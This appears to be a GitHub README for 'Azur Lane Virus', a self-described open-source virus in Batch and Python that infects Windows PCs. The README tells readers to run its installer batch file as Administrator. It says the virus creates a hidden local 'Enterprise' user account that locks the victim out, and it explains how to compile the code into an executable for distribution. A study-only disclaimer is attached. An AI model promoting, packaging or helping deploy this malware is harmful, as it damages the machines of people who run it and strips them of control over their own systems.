/alvirus

The source code of the computer virus named "Azur Lane".

Primary LanguagePython

Azur Lane Virus

A free and an open-source virus written in Batch or Python that infects Windows PCs, It was written in Batch first, then right now it is converted into a working Python code.

How to test?

Just clone/download this repository contents as a .zip file (ensure all files are in one directory), then right click on the file named azur-lane-virus-installer-source-code.official.bat then select "Run as Administrator" and click "Yes" if prompted, then enjoy!.

I'm just too lazy to compile this into an executable, I can't remember how did I compile it + I switched to python a long ago so i no longer work on batch files anymore.
The Azur Lane Virus Project
The Azur Lane Virus Project
The Azur Lane Virus Project
The Azur Lane Virus Project

Where is the source code?

In the main branch.

Disclaimer :

This program is not intended to be used for any illegal purpose, You are supposed to use it in accordings to the law,
I just posted it here so you can study the source code not to mess with it and to misuse the project.

Download :

To get the source code of this project in your computer's Hard drive, you must have git installed, if you already have it installed, execute the following commands :

mkdir working-dir
cd working-dir
git clone https://github.com/insertx2k/alvirus

A useful pro tip:

This virus creates a new user named "Enterprise" in your local SYSTEM, If you want to escape from the virus you should guess the password of it.
The lines used to create a user named Enterprise in your local SYSTEM

FAQ:

How do I compile this into a working exe file?:
Use either pyinstaller or py2exe, but I strongly recommend pyinstaller for many reasons.
For batch versions of this source code, use a tool named Bat To Exe Converter by Fatih Kodak.


Mr.X - 2021